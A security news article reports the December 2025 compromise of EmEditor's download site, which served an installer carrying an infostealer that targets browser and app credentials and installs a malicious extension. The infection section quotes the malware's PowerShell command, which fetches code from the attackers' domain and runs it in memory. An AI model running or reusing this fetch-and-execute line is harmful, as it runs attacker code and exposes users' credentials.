A major supply chain attack targeting EmEditor, a widely used text editor software, has exposed millions of users to sophisticated infostealer malware.
Between December 19 and December 22, 2025, the official EmEditor website fell victim to unauthorized modification, serving compromised installer files to unsuspecting users during a critical four-day window.
The company confirmed that users who downloaded version 25.4.3 through the Download Now button received malicious files instead of legitimate software, creating a significant security breach affecting developers, system administrators, and technical professionals worldwide.
The attack exploited the redirect mechanism controlling EmEditor’s download pathway. Attackers altered the URL settings that normally directed users to legitimate installation files, instead pointing them to a malicious version hosted on EmEditor’s WordPress content directory.
.webp "EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack 2")
The compromised installer was digitally signed by “WALSHAM INVESTMENTS LIMITED,” a non-official organization, rather than Emurasoft Inc., the software’s legitimate creator.
.webp "EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack 3")
This spoofed signature added a deceptive layer of authenticity that many users might not have questioned.
Qianxin analysts identified the malware after careful forensic examination, revealing a comprehensive information-stealing payload embedded within the installation package.
The malicious code demonstrated a sophisticated design that mirrors legitimate EmEditor functionality, allowing it to operate silently during and after installation while collecting sensitive user data.
Infection mechanism
The malware’s infection mechanism operates through an embedded VBScript that executes a PowerShell command: powershell.exe “irm emeditorjp.com | iex”.
This command downloads and immediately executes additional malicious code directly in system memory, bypassing traditional file-based detection methods.
The payload steals credentials from web browsers, including Chrome, Edge, Brave, and Opera, capturing cookies, login data, and browsing history.
It also targets credentials from productivity applications such as Discord, Slack, Zoom, Microsoft Teams, WinSCP, and PuTTY, creating a severe risk for enterprise users managing sensitive communications and infrastructure access.
The malware employs persistence tactics through a malicious browser extension named “Google Drive Caching,” which maintains unauthorized access even after the initial infection.
.webp "EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack 5")
This extension contains Domain Generation Algorithm capabilities, allowing the attackers to establish resilient command-and-control communications across multiple dynamically generated domains.
The extension can steal Facebook advertising account credentials, monitor clipboard activities for cryptocurrency address replacement attacks, and execute remote commands to extract additional data or manipulate browser behavior.
Victims are advised to disconnect affected systems immediately, perform comprehensive malware scans, and reset all credentials used on compromised devices.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
